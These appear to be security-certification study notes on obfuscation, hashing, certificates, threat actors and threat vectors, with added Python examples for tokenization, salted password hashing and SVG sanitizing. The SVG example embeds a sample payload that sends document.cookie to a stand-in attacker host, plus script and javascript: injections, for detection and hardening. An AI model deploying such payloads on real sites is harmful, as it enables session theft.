– And other sensitive data
May only be hidden from view
– The data may still be intact in storage
– Control the view based on permissions
Many different techniques
– Substituting, shuffling, encrypting, masking out, etc.

Other steganography types
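Tokenization and data masking from the Obfuscation section above, side by side, as an added example (not code from the course notes). The in-memory vault stands in for a tokenization service’s protected store, the SSN and card number are constructed sample values, and the role names in render_for are assumptions. The contrast is the point: a token can only be reversed by asking the vault, because it has no mathematical relationship to the original, while a masked value is the real value with digits hidden in the view, so the stored record is still sensitive.

```python
"""Tokenization and data masking side by side.

Added example, not from the course notes. The vault is an in-memory dict
standing in for a tokenization service's protected store, and the SSN and
card number are constructed sample values (assumptions made for this example).
"""
import secrets
from typing import Dict


class TokenVault:
    """Maps random tokens to the original values.

    A token shares no mathematical relationship with the value it replaces:
    without the vault there is nothing to decrypt, which is what makes a
    captured token useless to an attacker."""

    def __init__(self) -> None:
        self._token_to_value: Dict[str, str] = {}
        self._value_to_token: Dict[str, str] = {}

    def tokenize(self, value: str) -> str:
        """Return a format-preserving token: digits become random digits,
        separators stay put (266-12-1112 -> something like 691-61-8539)."""
        if value in self._value_to_token:            # same value, same token: records still join
            return self._value_to_token[value]
        while True:
            token = "".join(str(secrets.randbelow(10)) if c.isdigit() else c for c in value)
            if token != value and token not in self._token_to_value:
                break
        self._token_to_value[token] = value
        self._value_to_token[value] = token
        return token

    def detokenize(self, token: str) -> str:
        """Only the vault can go back; KeyError for anything it never issued."""
        return self._token_to_value[token]


def mask(value: str, visible_tail: int = 4, mask_char: str = "X") -> str:
    """Masking hides from view only: all but the last `visible_tail` digits are
    replaced, separators are kept, and the stored value is untouched."""
    total_digits = sum(c.isdigit() for c in value)
    seen, out = 0, []
    for c in value:
        if c.isdigit():
            seen += 1
            out.append(c if seen > total_digits - visible_tail else mask_char)
        else:
            out.append(c)
    return "".join(out)


def render_for(role: str, record: Dict[str, str]) -> Dict[str, str]:
    """Control the view based on permissions: the database row is the same,
    only the presentation changes per role (role names are assumptions)."""
    if role == "fraud_analyst":
        return dict(record)                         # full view
    return {k: mask(v) for k, v in record.items()}  # everyone else sees masked fields


if __name__ == "__main__":
    vault = TokenVault()
    token = vault.tokenize("4111 1111 1111 1111")   # constructed test card number
    print("token:", token, "-> original:", vault.detokenize(token))
    print(render_for("support", {"ssn": "266-12-1112", "card": "4111 1111 1111 1111"}))
```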
1.4 - Obfuscation (continued)

Audio steganography
– Modify the digital audio file
– Interlace a secret message within the audio
– Similar technique to image steganography
Video steganography
– A sequence of images
– Use image steganography on a larger scale
– Manage the signal to noise ratio
– Potentially transfer much more information

Tokenization (figure)

1.4 - Hashing and Digital Signatures

Hashes
Represent data as a short string of text
– A message digest, a fingerprint
One-way trip
– Impossible to recover the original message from the digest
– Used to store passwords / confidentiality
Verify a downloaded document is the same as the original
– Integrity
Can be a digital signature
– Authentication, non-repudiation, and integrity

Collision
Hash functions
– Take an input of any size
– Create a fixed size string
– Message digest, checksum
The hash should be unique
– Different inputs should never create the same hash
– If they do, it’s a collision
MD5 has a collision problem
– Found in 1996 - Don’t use MD5 for anything important

Practical hashing
Verify a downloaded file
– Hashes may be provided on the download site
– Compare the downloaded file hash with the posted hash value
Password storage
– Instead of storing the password, store a salted hash
– Compare hashes during the authentication process
– Nobody ever knows your actual password

Adding some salt
Salt
– Random data added to a password when hashing
Every user gets their own random salt
– The salt is commonly stored with the password
Rainbow tables won’t work with salted hashes
– Additional random value added to the original password
This slows down the brute force process
– It doesn’t completely stop the reverse engineering

Salting the hash
Each user gets a different random salt
– The same password creates a different hash

Digital signatures
Prove the message was not changed
– Integrity
Prove the source of the message
– Authentication
Make sure the signature isn’t fake
– Non-repudiation
Sign with the private key
– The message doesn’t need to be encrypted
– Nobody else can sign this (obviously)
Verify with the public key
– Any change in the message will invalidate the signature

Salting the Hash (figure)

1.4 - Blockchain Technology

Blockchain
A distributed ledger
– Keep track of transactions
Everyone on the blockchain network maintains the ledger
– Records and replicates to anyone and everyone
Many practical applications
– Payment processing
– Digital identification
– Supply chain monitoring
– Digital voting

1.4 - Certificates

Digital certificates
A public key certificate
– Binds a public key with a digital signature
– And other details about the key holder
A digital signature adds trust
– PKI uses Certificate Authorities for additional trust
– Web of Trust adds other users for additional trust
Certificate creation can be built into the OS
– Part of Windows Domain services
– Many 3rd-party options

Certificate signing requests
Create a key pair, then send the public key to the CA to be signed
– A certificate signing request (CSR)
The CA validates the request
– Confirms DNS, email, and website ownership
CA digitally signs the cert
– Returns to the applicant

What’s in a digital certificate?

Private certificate authorities
You are your own CA
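The password-storage and download-verification practices from the Key stretching, Adding some salt, Salting the hash and Practical hashing sections above, as an added example (not code from the course notes). The stored record format pbkdf2_sha256$<iterations>$<salt>$<hash> and the default iteration count are assumptions made for this example. The salt is random per user and stored beside the hash, the iteration count is the stretching (each guess costs the attacker that many rounds), and both comparisons are constant-time so timing does not reveal how many bytes matched.

```python
"""Salted, stretched password storage and download verification.

Added example, not from the course notes; it works through the Key stretching,
Adding some salt / Salting the hash and Practical hashing sections. The record
format "pbkdf2_sha256$<iterations>$<salt>$<hash>" and the iteration count are
assumptions made for this example.
"""
import base64
import hashlib
import hmac
import secrets

ITERATIONS = 600_000   # key stretching; OWASP 2023 figure for PBKDF2-HMAC-SHA256 (assumed default)


def hash_password(password: str, iterations: int = ITERATIONS) -> str:
    """Store a per-user random salt plus the stretched hash; the password itself is never stored."""
    salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations,
                                        base64.b64encode(salt).decode(),
                                        base64.b64encode(digest).decode())


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algorithm, iterations, salt_b64, digest_b64 = stored.split("$")
    if algorithm != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    base64.b64decode(salt_b64), int(iterations))
    return hmac.compare_digest(candidate, base64.b64decode(digest_b64))


def same_password_different_records(password: str, iterations: int = ITERATIONS) -> bool:
    """Why rainbow tables fail against salted hashes: two users with the same
    password get two different stored records."""
    return hash_password(password, iterations) != hash_password(password, iterations)


def sha256_hex(data: bytes) -> str:
    """The digest a download site publishes next to the file."""
    return hashlib.sha256(data).hexdigest()


def verify_download(data: bytes, published_hex: str) -> bool:
    """Practical hashing: compare the file you received with the posted hash value."""
    return hmac.compare_digest(sha256_hex(data), published_hex.strip().lower())


if __name__ == "__main__":
    record = hash_password("correct horse battery staple")
    print(record)
    print("login ok:", verify_password("correct horse battery staple", record))
    print("wrong password:", verify_password("Correct horse battery staple", record))
```

The iteration count travels inside the record, so it can be raised for new users without breaking existing logins: old records still verify with their own count, and can be re-hashed on the next successful login.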
1.4 - Certificates (continued)

Private certificate authorities (continued)
– Build it in-house
– Your devices must trust the internal CA
Needed for medium-to-large organizations
– Many web servers and privacy requirements
Implement as part of your overall computing strategy
– Windows Certificate Services, OpenCA

What’s in a digital certificate? (continued)
X.509
– Standard format
Certificate details
– Serial number
– Version
– Signature Algorithm
– Issuer
– Name of the cert holder
– Public key
– Extensions
– And more…

Root of trust
Everything associated with IT security requires trust
– A foundational characteristic
How to build trust from something unknown?
– Someone/something trustworthy provides their approval
Refer to the root of trust
– An inherently trusted component
– Hardware, software, firmware, or other component
– Hardware security module (HSM), Secure Enclave, Certificate Authority, etc.

Certificate Authorities
You connect to a random website
– Do you trust it?
Need a good way to trust an unknown entity
– Use a trusted third-party
– An authority
Certificate Authority (CA) has digitally signed the website certificate
– You trust the CA, therefore you trust the website
– Real-time verification

Third-party certificate authorities
Built into your browser
– Any browser
Purchase your website certificate
– It will be trusted by everyone’s browser
CA is responsible for vetting the request
– They will confirm the certificate owner
– Additional verification information may be required by the CA

Self-signed certificates
Internal certificates don’t need to be signed by a public CA
– Your company is the only one going to use it
– No need to purchase trust for devices that already trust you
Build your own CA
– Issue your own certificates signed by your own CA
Install the CA certificate/trusted chain on all devices
– They’ll now trust any certificates signed by your internal CA
– Works exactly like a certificate you purchased

Wildcard certificates
Subject Alternative Name (SAN)
– Extension to an X.509 certificate
– Lists additional identification information
– Allows a certificate to support many different domains
Wildcard domain
– Certificates are based on the name of the server
– A wildcard domain will apply to all server names in a domain
– *.professormesser.com

Key revocation
Certificate Revocation List (CRL)
– Maintained by the Certificate Authority (CA)
– Can contain many revocations in a large file
Many different reasons
– Changes all the time
April 2014 - CVE-2014-0160
– Heartbleed
– OpenSSL flaw put the private key of affected web servers at risk
– OpenSSL was patched, every web server certificate was replaced
– Older certificates were moved to the CRL

1.4 - Certificates (continued)

Getting revocation details to the browser
OCSP (Online Certificate Status Protocol)
– The browser can check certificate revocation
Messages usually sent to an OCSP responder via HTTP
– Easy to support over Internet links
– More efficient than downloading a CRL
Not all browsers/apps support OCSP
– Early Internet Explorer versions did not support OCSP
– Some support OCSP, but don’t bother checking

OCSP stapling
Online Certificate Status Protocol
– Provides scalability for OCSP checks
The CA is responsible for responding to all client OCSP requests
– This may not scale well
Instead, have the certificate holder verify their own status
– Status information is stored on the certificate holder’s server
OCSP status is “stapled” into the SSL/TLS handshake
– Digitally signed by the CA

Certificate signing requests (figure: Applicant and Certificate Authority)
1 Create a key pair (applicant’s private key and public key), then send the public key together with the applicant’s identifying information to the CA to be signed - the Certificate Signing Request (CSR)
2 The CA validates the applicant’s identity
3 The CA digitally signs the certificate with the CA’s private key and returns the digitally signed certificate to the applicant
2.1 - Threat Actors

Threat Actors
The entity responsible for an event that has an impact on the safety of another entity
– Also called a malicious actor
Threat actor attributes
– Describes characteristics of the attacker
Useful to categorize the motivation
– Why is this attack happening?
– Is this directed or random?

Attributes of threat actors
Internal/external
– The attacker is inside the house
– They’re outside and trying to get in
Resources/funding
– No money
– Extensive funding
Level of sophistication/capability
– Blindly runs scripts or automated vulnerability scans
– Can write their own attack malware and scripts

Motivations of threat actors
What makes them tick?
– There’s a purpose to this attack
Motivations include
– Data exfiltration
– Espionage
– Service disruption
– Blackmail
– Financial gain
– Philosophical/political beliefs
– Ethical
– Revenge
– Disruption/chaos
– War

Nation states
External entity
– Government and national security
Many possible motivations
– Data exfiltration, philosophical, revenge, disruption, war
Constant attacks, massive resources
– Commonly an Advanced Persistent Threat (APT)
Highest sophistication
– Military control, utilities, financial control
– United States and Israel destroyed 1,000 nuclear centrifuges with the Stuxnet worm

Unskilled attackers
Runs pre-made scripts without any knowledge of what’s really happening
– Anyone can do this
Motivated by the hunt
– Disruption, data exfiltration, sometimes philosophical
Can be internal or external
– But usually external
Not very sophisticated
– Limited resources, if any
No formal funding
– Looking for low hanging fruit

Hacktivist
A hacker with a purpose
– Motivated by philosophy, revenge, disruption, etc.
Often an external entity
– Could potentially infiltrate to also be an insider threat
Can be remarkably sophisticated
– Very specific hacks
– DoS, web site defacing, private document release
Funding may be limited
– Some organizations have fundraising options

Insider threat
More than just passwords on sticky notes
– Motivated by revenge, financial gain
Extensive resources
– Using the organization’s resources against themselves
An internal entity
– Eating away from the inside
Medium level of sophistication
– The insider has institutional knowledge
– Attacks can be directed at vulnerable systems
– The insider knows what to hit

Organized crime
Professional criminals
– Motivated by money
– Almost always an external entity
Very sophisticated
– Best hacking money can buy
Crime that’s organized
– One person hacks, one person manages the exploits, another person sells the data, another handles customer support
Lots of capital to fund hacking efforts

Shadow IT
Going rogue
– Working around the internal IT organization
– Builds their own infrastructure
Information Technology can put up roadblocks
– Shadow IT is unencumbered
– Use the cloud
– Might also be able to innovate
Limited resources
– Company budget
Medium sophistication
– May not have IT training or knowledge

2.2 - Common Threat Vectors

Threat vectors
A method used by the attacker
– Gain access to or infect the target
– Also called “attack vectors”
A lot of work goes into finding vulnerabilities in these vectors
– Some are more vulnerable than others
IT security professionals spend their career watching these vectors
– Protect existing vectors
– Find new vectors

Message-based vectors
Phishing attacks
– People want to click links
– Links in an email, links sent via text or IM
Deliver the malware to the user
– Attach it to the email
– Scan all attachments, never launch untrusted links
Social engineering attacks
– Invoice scams, cryptocurrency scams

Image-based vectors
Easy to identify a text-based threat
– It’s more difficult to identify the threat in an image
Some image formats can be a threat
– The SVG (Scalable Vector Graphics) format
– Image is described in XML (Extensible Markup Language)
Significant security concerns
– HTML injection
– JavaScript attack code
Browsers must provide input validation
– Avoids running malicious code

File-based vectors
More than just executables
– Malicious code can hide in many places
Adobe PDF
– A file format containing other objects
ZIP/RAR files (or any compression type)
– Contains many different files
Microsoft Office
– Documents with macros
– Add-in files

Voice call vectors
Vishing
– Phishing over the phone
Spam over IP
– Large-scale phone calls
War dialing
– It still happens
Call tampering
– Disrupting voice calls

Removable device vectors
Get around the firewall
– The USB interface
Malicious software on USB flash drives
– Infect air gapped networks
– Industrial systems, high-security services
USB devices can act as keyboards
– Hacker on a chip
Data exfiltration
– Terabytes of data walk out the door
– Zero bandwidth used

2.2 - Common Threat Vectors (continued)

Vulnerable software vectors
Client-based
– Infected executable
– Known (or unknown) vulnerabilities
– May require constant updates
Agentless
– No installed exe

Open service ports
Most network-based services connect over a TCP or UDP port
– An “open” port
Every open port is an opportunity for the attacker
– Application vulnerability or misconfiguration
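The input validation that the Image-based vectors section above expects of browsers, applied server-side to an uploaded SVG, as an added example (not code from the course notes). The sample SVG is constructed for this example and carries an event handler, a script element, a javascript: link and a foreignObject with embedded HTML; the element and attribute policy is a deliberately small one chosen here, not a complete SVG sanitizer. Python’s xml.etree only builds a tree and never executes anything, so inspecting the file is safe, but for untrusted XML in production prefer defusedxml, which defends against entity-expansion attacks regardless of the underlying Expat version.

```python
"""Validating an uploaded SVG before it reaches a browser.

Added example, not from the course notes. The sample file is constructed and
the element/attribute policy below is a deliberately small one chosen for
this example. xml.etree only builds a tree, it never runs anything, so
inspecting it is safe; for untrusted XML in production use defusedxml.
"""
import xml.etree.ElementTree as ET
from typing import List

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"

# Elements that run script or embed HTML inside the "image".
ACTIVE_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object"}
# URL schemes that execute or smuggle content when used in href/xlink:href.
ACTIVE_SCHEMES = {"javascript", "vbscript", "data"}   # 'data' is a strict choice; relax for image/* if needed

# Constructed sample: a valid drawing carrying four separate attack vectors.
MALICIOUS_SVG = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="100" height="100" onload="fetch('https://attacker.invalid/?c=' + document.cookie)">
  <circle cx="50" cy="50" r="40" fill="red"/>
  <script>alert(document.domain)</script>
  <a xlink:href="javascript:alert(1)"><text x="10" y="20">click me</text></a>
  <foreignObject width="100" height="50">
    <body xmlns="http://www.w3.org/1999/xhtml"><img src="x" onerror="alert(2)"/></body>
  </foreignObject>
</svg>"""


def local_name(qualified: str) -> str:
    """ElementTree writes tags/attributes as '{namespace}name'; keep only 'name'."""
    return qualified.rsplit("}", 1)[-1]


def is_active_attribute(attr: str, value: str) -> bool:
    """Event handlers (on*) and script-capable URLs in href/xlink:href."""
    name = local_name(attr)
    if name.lower().startswith("on"):
        return True
    if name == "href":
        scheme = value.strip().lower().split(":", 1)[0]
        return ":" in value and scheme in ACTIVE_SCHEMES
    return False


def find_active_content(svg: bytes) -> List[str]:
    """Detection: list every script-capable element or attribute; empty means clean."""
    findings = []
    for elem in ET.fromstring(svg).iter():
        tag = local_name(elem.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"element <{tag}>")
        for attr, value in elem.attrib.items():
            if is_active_attribute(attr, value):
                findings.append(f"attribute {local_name(attr)} on <{tag}>")
    return findings


def sanitize_svg(svg: bytes) -> bytes:
    """Hardening: drop the active parts, keep the drawing."""
    root = ET.fromstring(svg)
    if local_name(root.tag) != "svg":
        raise ValueError("not an SVG document")
    for parent in list(root.iter()):                    # snapshot: the tree is mutated while walking
        for child in list(parent):
            if local_name(child.tag) in ACTIVE_ELEMENTS:
                parent.remove(child)
    for elem in root.iter():
        for attr in [a for a, v in elem.attrib.items() if is_active_attribute(a, v)]:
            del elem.attrib[attr]
    ET.register_namespace("", SVG_NS)
    ET.register_namespace("xlink", XLINK_NS)
    return ET.tostring(root)


if __name__ == "__main__":
    print("findings:", find_active_content(MALICIOUS_SVG))
    print(sanitize_svg(MALICIOUS_SVG).decode())
```

find_active_content is the detection side, what an upload gateway logs and rejects; sanitize_svg is the hardening side for when the drawing itself must be kept. Rejecting is the safer default: an allow-list of drawing elements is easier to reason about than a deny-list of active ones.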
